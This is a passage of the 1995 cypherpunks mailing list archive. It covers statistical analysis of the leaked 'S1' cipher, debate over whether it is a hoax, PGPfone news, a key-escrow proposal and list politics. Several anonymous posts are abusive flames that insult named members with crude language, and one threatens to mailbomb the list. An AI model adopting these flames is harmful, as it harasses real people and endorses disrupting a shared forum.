than others.  This means that some values are more likely to be XORed
against the cleartext than others.  Needless to say, this is a very
unusual (and presumably very bad) property - in DES, for example, the
Sbox outputs are completely flat.

I've been avoiding real work today, so here's a breakdown of the
distribution of output values for F0-F3 by value and by bit
position, as well as the total for all four.  (The expected numbers are
16 for the outputs by value and 128 for the outputs by bit).

If I get more time, I'll try to figure out how to do a structure a
differential attack (which will be a little bit tricky given the
G function).  I'm not sure this is worth putting much effort
into, however, given that the closer I look the more hoax-like this
seems.  Much as I'd like to think this is a version of Skipjack, it's
getting pretty hard to suspend disbelief.  I might be willing to
believe, however, that this is some kind of proprietary industrial
cipher; perhaps the poster added the "TOP SECRET" stuff to attract
additional attention to it.

All in all, this is a most unusual cipher.  On the surface at least,
it has many elements of a really bad design.  On the other hand, some
of the other ideas are novel enough that I wonder why its inventors
wouldn't want to be associated with them.

-matt


---F0 output distribution---
F0:0 = 18 (1.12) ******************
F0:1 = 10 (0.62) **********
F0:2 = 17 (1.06) *****************
F0:3 = 15 (0.94) ***************
F0:4 = 13 (0.81) *************
F0:5 = 12 (0.75) ************
F0:6 = 18 (1.12) ******************
F0:7 = 14 (0.88) **************
F0:8 = 17 (1.06) *****************
F0:9 = 18 (1.12) ******************
F0:a = 14 (0.88) **************
F0:b = 17 (1.06) *****************
F0:c = 18 (1.12) ******************
F0:d = 12 (0.75) ************
F0:e = 19 (1.19) *******************
F0:f = 24 (1.50) ************************
---by bit---
F0:1 = 122 (0.95) ***************
F0:2 = 138 (1.08) *****************
F0:4 = 130 (1.02) ****************
F0:8 = 139 (1.09) *****************

---F1 output distribution---
F1:0 = 21 (1.31) *********************
F1:1 = 13 (0.81) *************
F1:2 = 15 (0.94) ***************
F1:3 = 20 (1.25) ********************
F1:4 = 22 (1.38) **********************
F1:5 = 15 (0.94) ***************
F1:6 =  8 (0.50) ********
F1:7 = 22 (1.38) **********************
F1:8 = 19 (1.19) *******************
F1:9 = 18 (1.12) ******************
F1:a = 15 (0.94) ***************
F1:b = 13 (0.81) *************
F1:c = 10 (0.62) **********
F1:d = 12 (0.75) ************
F1:e =  9 (0.56) *********
F1:f = 24 (1.50) ************************
---by bit---
F1:1 = 137 (1.07) *****************
F1:2 = 126 (0.98) ***************
F1:4 = 122 (0.95) ***************
F1:8 = 120 (0.94) ***************

---F2 output distribution---
F2:0 = 16 (1.00) ****************
F2:1 = 13 (0.81) *************
F2:2 = 16 (1.00) ****************
F2:3 = 13 (0.81) *************
F2:4 = 12 (0.75) ************
F2:5 = 17 (1.06) *****************
F2:6 = 16 (1.00) ****************
F2:7 = 16 (1.00) ****************
F2:8 = 14 (0.88) **************
F2:9 = 22 (1.38) **********************
F2:a = 27 (1.69) ***************************
F2:b = 19 (1.19) *******************
F2:c = 14 (0.88) **************
F2:d = 16 (1.00) ****************
F2:e = 11 (0.69) ***********
F2:f = 14 (0.88) **************
---by bit---
F2:1 = 130 (1.02) ****************
F2:2 = 132 (1.03) ****************
F2:4 = 116 (0.91) **************
F2:8 = 137 (1.07) *****************

---F3 output distribution---
F3:0 = 23 (1.44) ***********************
F3:1 = 20 (1.25) ********************
F3:2 = 11 (0.69) ***********
F3:3 = 23 (1.44) ***********************
F3:4 = 17 (1.06) *****************
F3:5 = 15 (0.94) ***************
F3:6 = 13 (0.81) *************
F3:7 = 17 (1.06) *****************
F3:8 = 15 (0.94) ***************
F3:9 = 11 (0.69) ***********
F3:a =  9 (0.56) *********
F3:b = 19 (1.19) *******************
F3:c = 14 (0.88) **************
F3:d = 16 (1.00) ****************
F3:e = 14 (0.88) **************
F3:f = 19 (1.19) *******************
---by bit---
F3:1 = 140 (1.09) *****************
F3:2 = 125 (0.98) ***************
F3:4 = 125 (0.98) ***************
F3:8 = 117 (0.91) **************


===overall sum===
---F* output distribution---
F:0 =  78 (1.22) *******************
F:1 =  56 (0.88) **************
F:2 =  59 (0.92) **************
F:3 =  71 (1.11) *****************
F:4 =  64 (1.00) ****************
F:5 =  59 (0.92) **************
F:6 =  55 (0.86) *************
F:7 =  69 (1.08) *****************
F:8 =  65 (1.02) ****************
F:9 =  69 (1.08) *****************
F:a =  65 (1.02) ****************
F:b =  68 (1.06) *****************
F:c =  56 (0.88) **************
F:d =  56 (0.88) **************
F:e =  53 (0.83) *************
F:f =  81 (1.27) ********************
---by bit---
F:1 =  529 (1.03) ****************
F:2 =  521 (1.02) ****************
F:4 =  493 (0.96) ***************
F:8 =  513 (1.00) ****************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 10 Aug 95 16:42:56 PDT
To: sameer <sameer@c2.org>
Subject: Re: Crypto = Competitive Advantage?
Message-ID: <ac4fe778000210047278@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:30 PM 8/10/95, sameer wrote:
>>
>> It seems that anything involving the Internet, the Web, and digital
>> commerce is really, really hot.
>
>        The fire that burns twice as hot burns half as long. It may be
>a cliche but it is quite applicable here I think.

Indeed. Who now recalls Jaron Lanier's virtual reality company?

(In retrospect, Jaron's error was in not finding a way to take VPL public.
VPL was the Netscape of 1990. But will Netscape be the VPL of 1992?)

Let the record show that I was not one of the tens of thousands of people
calling their brokers trying to get in on the Netscape IPO. (Though getting
in at the IPO price and selling out the same day was obviously lucrative
for a lot of folks.)

--Tim May

Special note: My ISP has changed its domain name from "sensemedia.net" to
"got.net" (as in "got milk?"), so I have to again ask you all to bear with
me and use my new e-mail address, "tcmay@got.net".
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 11 Aug 95 13:12:54 PDT
To: cypherpunks@toad.com
Subject: TIM MAY IS A CYPHERWEENIE
Message-ID: <199508102357.QAA02488@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I think we ought to just throw TIM MAY out of the list.
let's EXCOMMUNICATE HIM. its becoming increasingly clear
that he is the source of all our problems. I mean, isn't
it obvious that our progress has stalled? who has written
any code within the last 3 days? if we got rid of him,
it would be EVOLUTION IN ACTION. this is ERIC HUGHES'
mailing list, and eric hughes knows how to write some
decent code. I mean, TCM's signature doesn't even have any
geek code, and he hasn't changed it in 4 years or so,
at least since my last grandparent died (and she was 
considerably more skillful at programming than TCM by
knowing how to make toast).

get rid of all the pricks who continually spout and spew conspiracy
theories. let TCM go and find himself a new mailing list.
that would be a fair comeuppance if he found that he couldn't
learn to do squish because he doesn't have the slightest
clue. he's a leech, a parasite, sucking on the work of
others, pretending that he is at the forefront of our
cause when he is only at the forefront of maniacal egomania.
what has he contributed to the cause? SQUAT. just a lot
of ranting about conspiracy theories and his Stock Pick
of the Week crap. "the web is really growing. people should
focus on it". well, THANK YOU VERY MUCH, MR. BRILLIANT
COMMENTATOR AND VISIONARY, T.C.MAY, I would have never
have THOUGHT of that in a zillion years, but now that you
point it out, I GUESS YOU'RE RIGHT.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bshantz@nwlink.com (Brad Shantz)
Date: Thu, 10 Aug 95 17:02:36 PDT
To: nobody@REPLAY.COM (Anonymous)
Subject: Re: PERRY METZGER: YOUR MOMMY IS CALLING YOU HOME
Message-ID: <199508110003.RAA02472@washington.nwlink.com>
MIME-Version: 1.0
Content-Type: text/plain


>I'm tired of Perry. 

<REST DELETED>

I think that any Perry bashing can be taken offline.  I don't think that 700
people subscribed to the "I Hate Perry Metzger" list; they subscribed to
cypherpunks.

If you have anything to say to Perry, tell him in private e-mail. Don't post
a milion lines of shit to the list.

Get a clue folks...

Brad





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. M. Ellis" <kelli@zeus.towson.edu>
Date: Thu, 10 Aug 95 14:04:24 PDT
To: perry@piermont.com
Subject: Re: Conspiracies and "Ciphergroupies"
In-Reply-To: <199508101943.PAA27611@panix4.panix.com>
Message-ID: <Pine.ULT.3.91.950810170000.18389A-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 10 Aug 1995, Perry E. Metzger wrote:

> 
> This is only of interest to a very limited number of people. Its
> basically a flame about private matters. I discourage reading it.
> 

<mega-snip>

This disclaimer means nothing.  Gentlemen, this discussion is pointless.  
Please, on behalf of the little people, shut up already!

-=Kathleen M. Ellis=-

kelli@zeus.towson.edu                         http://zeus.towson.edu/~kelli/
Diverse Sexual Orientation Coll.Towson State University DSOC@zeus.towson.edu






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Thu, 10 Aug 95 15:22:46 PDT
To: Censored Girls Anonymous <carolab@censored.org>
Subject: Re: Conspiracies and "Ciphergroupies"
In-Reply-To: <Pine.BSI.3.91.950810155403.14661A-100000@usr2.primenet.com>
Message-ID: <Pine.ULT.3.91.950810172022.9518B-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 10 Aug 1995, Censored Girls Anonymous wrote:

> Robert now "Pinesigns" everything.

Yup, and it's encouraging a lot of other lay-people to investigate PGP 
and digital signatures. In the last week, I've gotten 200 or so hits on 
Pinesign and Tinsign from my homepage.  That's my purpose, get the word 
out, and it's working. :-)

> Have a fun summer...fall is coming soon, and light
> a candle for Jerry Garica today.

uh, a candle is the last thing I'd expect most people are lighting today 
in rememberance....

> Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure

Upgrade, unsecure :-)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMCpqrDokqlyVGmCFAQFejAP+MhiolnfInEctzT9ihVSozbZqVbdPXJ4j
cIFugNnezRnLI7C/5ekHwLzZcEJH6MhaDgMckgIoYAs+/xyJTQs3407DO7AFx2lU
rZERB+p2Kdpp4FMq+7fTQjF36RugEozQXVCAJJ97MwUq1/6YlCBIfJliTRcLH7Jm
qsrlSFn9sE8=
=6lXM
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.0
GED/J d-- s:++>: a-- C++(++++) ULU++ P+! L++ E---- W+(-) N++++ K+++ w---
O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G++++>$ e++ h r-- y++**
------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 10 Aug 95 14:31:44 PDT
To: cypherpunks@toad.com
Subject: DED_hed
Message-ID: <199508102131.RAA26878@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-10-95. NYPaper Page-Oner:


   "Jerry Garcia of Grateful Dead, Icon of 60's Spirit, Dies
   at 53." By Jon Pareles, Music Critic.

   [With] "Sadness From the Streets to High Offices." By John
   Markoff.


   DED_hed







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 10 Aug 95 17:27:49 PDT
To: cypherpunks@toad.com
Subject: "Protect the children" as passphrase to Constitution
Message-ID: <ac4fef26020210044095@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I was reminded the other night by someone of the "'National security' is
the root passphrase of the Constitution." The idea being that the normal
Constitutional protections are bypassed by invocation of "national
security."

But it occurs to me that we are seeing a new variant of this: "Protect the
children."

Some recent examples:

- Clinton's Executive Order today which limits advertising of cigarettes,
limits the display of tobacco-related symbols and words on t-shirts,
baseball caps, billboards, and publically-visible signs at sports events.
(There were all kinds of details, most of them blatantly in violation of
the First Amendment. I half-watched the Clinton announcement, but didn't
take notes...consult your newspaper or the Web.)

The critical phrase: "We have to protect the children."

(Oh, and one amazing detail: the possible issuance of I.D. cards to all of
those under the age of 18. Besides being useful for things like curfews,
video tape rental prohibitions, and the cigarette ban, it would lead to
I.D. cards for those over 18. naturally (if those over 18 don't have to
carry them, then all a child less than 18 has to do is to claim not to have
to carry one because he's 18!)

- The whole Exon and V-chip debates, now likely to be passed by Congress,
are about "protecting children."

- and the Oklahoma City bombing, not that I supported it in any way, was
seen as especially horrific because of the children that were killed. This
means that restrictive legislation, such as bans on explosives information,
guns, etc., can be justified as measures to "protect children."

And so on.

Now clearly this strategy will be welcomed by many. It's hard to argue
against children and against the "protection of children." Arguing the
Constitutional side is tough when "the children" are at issue.

More speculatively, I think Clinton has hit on this strategy as a way to
line up support from the Republican majority in Congress on many key
issues. There may even be repercussions for welfare and health care issues
(which Clinton can also cast as "protect the children" issues).

The potential crypto relevance? Look for arguments about limiting access to
strong crypto to be more heavily focussed on "pedophiles" and
"pornographers." Look for calls to have a national I.D. card--which serves
many State-needed purposes (and I don't mean in terms of Revelations). A
national I.D. card could then be tied in to GAK/escrow systems.

"We have to protect the children."

--Tim May

Special note: My ISP has changed its domain name from "sensemedia.net" to
"got.net" (as in "got milk?"), so I have to again ask you all to bear with
me and use my new e-mail address, "tcmay@got.net".
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: corondan@eng.eds.com (George A. Corondan (corondan@eng.eds.com))
Date: Thu, 10 Aug 95 15:06:08 PDT
To: cypherpunks@toad.com
Subject: Re: "S1" encryption system (was: this looked like it might be interesting)
Message-ID: <9508102205.AA23622@earth.troy.eng.eds.com>
MIME-Version: 1.0
Content-Type: text/plain


On Aug 10, 12:02pm, David G. Koontz wrote:
> Subject: Re: "S1" encryption system (was: this looked like it might be int
> >Jon writes:
> >> Two other possibilities: (1) It's merely an independently produced 
> >> cryptosystem disguised as a "leak" to save its creator the trouble of 
> >> asking experts to analyze it for him/her.  
> 
> >It strikes me as rather foolish to mail off anonymous copies to several
> >individual recipients (Matt, Perry, Tim, ...) in addition to the list, if
> >S1 is a real leak. Why aid the traffic analysts by firing off multiple
> >messages through the remailers ?
> 
> A third possibility comes to mind, that person or persons associated with
> the list are using the post to focus on cryptographic efforts in lieu of
> political or apocalyptic diatribes.
how about a fourth possibility:  the government ___ agency did it.

this was done to achieve two goals:
	1) make cypherpunks easy to villify (look at all of the nasty crypto
		stuff being passed to foreign nationals)
	2) a quick estimate of cypherpunks' ability to analyze an algorithm

am i being too paranoid?  probably, but you tell me :-).

-- 
George A. Corondan        Inet: corondan@eng.eds.com
E.D.S. Mail Stop 4251     Voice: (810)265-2937
800 Tower Drive           FAX: (810)265-3432
Troy, MI 48098-7019




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nowhere@bsu-cs.bsu.edu>
Date: Thu, 10 Aug 95 16:29:34 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199508102329.SAA21100@bsu-cs.bsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


will someone just CUT THE @#$%^&* FOSTER CONSPIRACY THEORIES??
I'm getting F---ING SICK AND TIRED of all the BULL**** that
is being posted to this F---ING LIST!!!! does anyone give
a flying f--- whether Foster was killed or suicided or
hit by a bus?!?!?! WHAT DOES THIS HAVE TO DO WITH CYPHERPUNKS?
WHAT DOES THIS HAVE TO DO WITH CODE???

PARRY IS RIGHT. everyone else who disagrees can KISS MY ASS.
sign up for the PLAN TO ENCRYPT CYBERSPACE. parry is the man
to start with. he will get you started on his campaign like
any good drill instructer. oh yes, so many of you pansies
need to get into a serious digital BOOT camp. learn some real
manly things for a change!!!  besides gossiping and tittering
like grizzled grandmothers who haven't a clue or a life!!!

he's right, little TIMMY MAY
hasn't done one @#$%^&* productive thing in the last 5 years
after he quit Intel. oh yeah, he is raking in cash off all
his little darling stocks, but what the hell does he have
to say that is even slightly relevant to coding? my god,
here is a guy that barely even knows what linux IS, let alone
how to install it. I bet he thinks that "bash" is something
you do to the NSA!!! oh yeah, he goes to his silly little
"mind masturbating and drug fondling" parties every few
days with all the Hoi Poilloi Holier-Than-Thou pricks of
the world, the "cum of the net" ejaculating all over each
other, hehehehehehe what a bunch of effeminate nobodies...

PARRY is the premiere cypherpunk. he should be worshipped
by everyone. he has written dozens of RFCS which have made
cyberspace a far better place as we know it. if you don't
contribute to his solution, YOU ARE PART OF THE PROBLEM.
PARRY is part of the solution. HINT FOR THE CLUELESS: 
GET WITH THE PROGRAM. don't you think that you are being
the most scurrilous swine for taking up PARRY's time with
your filling up this mailing list with GARBAGE? TRASH?
EXCREMENT? ODIOUS EFFLUVIA??? don't you know that it cuts
into his insanely precious programming time by hours to have
to monitor this list closely to see if anyone posted some
boneheaded conspiracy theory or insulted him??? that
TAKES PRECIOUS TIME THAT HE COULD BE SPENDING TRADING
PROGRAMMING TECHNIQUES WITH BRILLIANT PEOPLE WHO KNOW
UNIX SOFTWARE AND HOW TO WRITE A CORRECT DNS LOOKUP VIA
SOCKET LIBRARIES. are we cypherpunks, or cypherprogrammers?
GET A CLUE, PEOPLE.

I SWEAR if I see one more FORWARDED ARTICLE TO THIS GROUP,
I'M GOING TO MAILBOMB THE WHOLE LIST. that'll teach the
@#$^%^&* bastards to mess with MY VALUABLE TIME.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Thu, 10 Aug 95 17:00:13 PDT
To: cypherpunks@toad.com
Subject: Is there a 12 step group in the house?
Message-ID: <Pine.BSI.3.91.950810185532.28698A-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Sounds like someone needs a meeting.
There are groups for obsessive/compulsive activity.

Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcaldwel@iquest.net (James Caldwell)
Date: Thu, 10 Aug 95 17:10:32 PDT
To: cypherpunks@toad.com
Subject: Re: "S1" encryption system (was: this looked like it might be interesting)
In-Reply-To: <9508102205.AA23622@earth.troy.eng.eds.com>
Message-ID: <m0sghYj-001g5mC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text


George A. Corondan (corondan@eng.eds.com) wrote:

> > >It strikes me as rather foolish to mail off anonymous copies to several
> > >individual recipients (Matt, Perry, Tim, ...) in addition to the list, if
> > >S1 is a real leak. Why aid the traffic analysts by firing off multiple
> > >messages through the remailers ?
> > 
> > A third possibility comes to mind, that person or persons associated with
> > the list are using the post to focus on cryptographic efforts in lieu of
> > political or apocalyptic diatribes.

> how about a fourth possibility:  the government ___ agency did it.

Can't play that game too much or you'll be in a padded room somewhere, 
probably a Federal mental hospital with no name..... ;-)

> this was done to achieve two goals:

> 	1) make cypherpunks easy to villify (look at all of the nasty crypto
> 		stuff being passed to foreign nationals)

> 	2) a quick estimate of cypherpunks' ability to analyze an algorithm

I'd say it was trashed in under 5 messages.

 > am i being too paranoid?  probably, but you tell me :-).

If the algorythim is compiled, supplied with a key and decrypts skipjack
/clipper/bubbaheres then you know it's real.


-- 
So you may wonder -- "But what does that have to do with me?"  
Answer: I have locked horns with "The Devil", buddy boy, 
and compared to  him, you ain't sh**.
 Brian Francis Redman to Chip Berlet






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Thu, 10 Aug 95 18:45:16 PDT
To: cypherpunks@toad.com
Subject: Re: DETWEILLER
In-Reply-To: <Pine.SUN.3.91.950802144812.22631E-100000@crl5.crl.com>
Message-ID: <fQrKwkkAsWoX084yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 2 Aug 1995, Sandy Sandfort <sandfort@crl.com> wrote:

> > > ObCypherpunk: Anybody heard from Detweiller?
> 
> Actually, he was at the last Bay Area Cypherpunks physical 
> meeting under another name.

And the Cypherpunk Merry Prankster who surreptitiously replaced
his Thorazine with Tic-Tacs now owes the list an apology! :-Q


Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 10 Aug 95 19:56:20 PDT
To: cypherpunks@toad.com
Subject: PRZ encrypted voice software release imminent
Message-ID: <199508110254.TAA02204@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



as if PRZ is not already enough of a folk hero....
BTW, he has been beat by Nautilus, right? Nautilus
is public domain, right? (I'm thinking of that public
domain voice encryption released a few mos ago).
I wonder if he is going to try to put a "spin" on this
one to differentiate it from the other one. on the 
other hand, just having his name on it is plenty of
"spin"...


------- Forwarded Message


- ------- Forwarded Message

Date: Thu, 10 Aug 1995 06:47:31 -0400 (EDT)
From: Brad Dolan <bdolan@use.usit.net>
Subject: Washington Whisper from U.S. News (fwd)



- - ---------- Forwarded message ----------
Date: Wed, 9 Aug 1995 21:26:42 -0700
Subject: Washington Whisper from U.S. News


From: Vic Sussman <vic@clark.net>

 
U.S.NEWS & WORLD REPORT, AUGUST 14, 1995
 
TAPS FOR THE CODE BREAKERS
 
The cryptographer who riled the federal government over his popular
encryption software, PGP (``Pretty Good Privacy''), claims he is only a
few weeks away from launching yet another dazzling piece of software:
PGPfone. Philip Zimmermann's latest product permits virtually untappable
telephone conversations through personal computers. But the launch of the
software, which uses military-grade encryption to scramble transmissions,
is likely to sharpen the debate among those who worry about such
technology falling into criminal or enemy hands and those who consider it
essential for secure communications, especially on the Internet. In a test
of the new software last week, a U.S. NEWS writer, using a
microphone-equipped laptop in Washington, found the encrypted conversation
with Zimmermann in Boulder, Colo., to be remarkably clear. Zimmermann, who
ran afoul of the government over charges--strongly denied--that he
illegally ``exported'' the PGP software on the Internet, says he plans to
give away his new software for free. Why? ``I can't simply stop doing what
I do because I'm afraid of angering the government,'' he says. ``Americans
have a right to private conversations.''
 
Copyright, 1995, U.S. News & World Report All rights reserved.


.............................................................................
Vic Sussman                    : "Lines of light ranged in the nonspace
U.S. News & World Report       : of the mind, clusters and constellations
vic@clark.net                  : of data. Like city lights, receding..."
http://www.clark.net/pub/
journalism/vic.html            :   _Neuromancer_     William Gibson
..............................................................................







- ------- End of Forwarded Message


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 10 Aug 95 17:23:37 PDT
To: cypherpunks@toad.com
Subject: It may be time to electrify the floor...
Message-ID: <v02120d09ac5051709fef@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


 ... because we seem to be in the throes of a listwide piss-fight.

Unless we're the victim of duelling rant generators -- but I don't think
this is the case, as they all happened too fast.

It's a nice night. Maybe I'll go sit on the back porch and smoke the
base-ball-bat Macanudo (cigar) I bought at Erlich's today...

See you all in the morning. Don't forget to insulate yourselves, everyone...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Thu, 10 Aug 95 20:38:33 PDT
To: CYPHERPUNKS@toad.com
Subject: If only Vxxxx Fxxxxx had used encryption....
Message-ID: <8AEE4DC.0003000301.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


 C'punks:

                [Wait!  This =is= crypto-related!  I promise!]

  Heard on the news today that Bernard Nussbaum said he had done
"nothing irregular" in going through Vince Foster's effects immediately
after his demise, in order to secure "sensitive information".
Presumably, Nussbaum's contention is that some of the information in
Foster's possession was covered by attorney-client privelege, and
therefore the Authorities had no right to take it into possession.

                 (IANAL-Comments from those who are?)

  Anyway, this case got me to thinking: If Vince had kept all his
"sensitive" things encrypted, and never written down the passphrase,
then the data would effectively have died with him. In this case, lack
of key escrow is not a bug, but a feature!

  Then I thought some more - that the whole Key Escrow thing needs to be
rethought: Instead of escrowing the private key, we need to develop
better key management techniques for multiple recipients.

  For example, if Alice is an attorney representing Carol Client, Bob
and Ray are partners in Alice's firm, which uses escrow agent E; and A,
B, C, R and E are the public keys (and A'... are the private keys) of
our dramatis personae:

  Carol sends her message to Alice as usual, generating the session key
S, and encrypting it S'=A(S).

  Whenever Alice recieves a message, after decrypting the session key
[S= A'(S')] she adds to it an additional S"= E( B(S) ) and S"'= E( R(S)
) or some other construct which involving Shamir Sharing or whatever.
The details of the protocol(s) can be worked out after the basic premise:

       There is no reason for anyone to give up the "master key" to all
     of their business, when the minimal overhead in storage space for
     adding an escrowed =session= key will suffice.

  PGP needs a mechanism to handle "detatched session keys", so that our
escrow agent can, upon notification by Bob and Ray that Alice has [died
| left the firm], process the whole package of S" and S"' back into B(S)
and R(S), so that Bob and Ray can carry on their work. Just as with a
detatched signature certificate going to a notary, the detatched session
key does not give the escrow agent any knowledge of the content of the
message itself.

  Another option is to put the whole creation of S" and S"' on to Carol,
which requires a public key that specifies E and {B, R}, as well as the
particular escrow protocol involved. This could be tricky to implement.

  Also, Carol needs to be able to specify to Alice that she is retaining
a copy of the communication, encrypted to self, and therefore Alice need
not escrow the session key for this particular message.


  Comments?



 * "All authority belongs to the people"
-Thomas Jefferson
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 11 Aug 95 01:55:14 PDT
To: cypherpunks@toad.com
Subject: Re:  More "S-1" foolishness
Message-ID: <199508110353.UAA04743@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


The other thing I noticed that really makes me question this is that G1
only uses 4 of its 8 input bits.  As I wrote, it is equivalent to
parity(i&0x17).  A bit is a terrible thing to waste, and it is hard to
imagine why it would do this intentionally.  G1 may not be that important
an element of the cipher but why throw away four bits?

It is possible I suppose that the F and G boxes are not the ones used
in the "real" version of whatever cipher this is, so this apparent
weakness and the ones which Matt has pointed out may not be that
significant.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Thu, 10 Aug 95 20:53:41 PDT
To: cypherpunks@toad.com
Subject: Re: PERRY METZGER: YOUR MOMMY IS CALLING YOU HOME
Message-ID: <9508110355.AA08727@accessone.com>
MIME-Version: 1.0
Content-Type: text/plain




	Hell hath no fury like a martyr scorned. . . 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Thu, 10 Aug 95 18:00:52 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: PERRY METZGER: YOUR MOMMY IS CALLING YOU HOME
In-Reply-To: <199508102337.BAA14035@utopia.hacktic.nl>
Message-ID: <9508110100.AA10650@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Well, for the record, _I_ certainly appreciate .pm's efforts on many fronts
related to cypherpunks.

Anonymous rants:
> I know you personally Perry, 

I doubt it. Prove it to me in *private* email.

-L. "Futplex" McCarthy   [PGP key available via finger or server]



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SysAdmin <admin@dcwill.com>
Date: Thu, 10 Aug 95 21:18:18 PDT
To: cypherpunks@toad.com
Subject: Crypto-relevant flame interruption
Message-ID: <199508110418.VAA07616@python.ee.unr.edu>
MIME-Version: 1.0
Content-Type: text/plain



Would someone be so kind as to provide a status report on the
planned SSL attack? Last word was that codework was still underway,
but I might have missed something relevant to this project amidst
all of the noise about excessive list noise. 

Fred  <admin@dcwill.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Thu, 10 Aug 95 13:28:13 PDT
To: Derek Atkins <warlord@ATHENA.MIT.EDU>
Subject: Re: PGP Tools on Linux
In-Reply-To: <199508101842.OAA22544@charon.MIT.EDU>
Message-ID: <Pine.3.89.9508102143.A22057-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 10 Aug 1995, Derek Atkins wrote:

> Yea, I did a long time ago.  There was a bug in the code that caused
> destroying fifos to do this -- it would free the fifo and then try to
> set it, or something like that.  You have to reorder a few commands to
> fix the problem.

No, it's not that one, I'm afraid - this version works fine on SunOS and 
has that fix in it... it just won't work on Linux.

	Mark





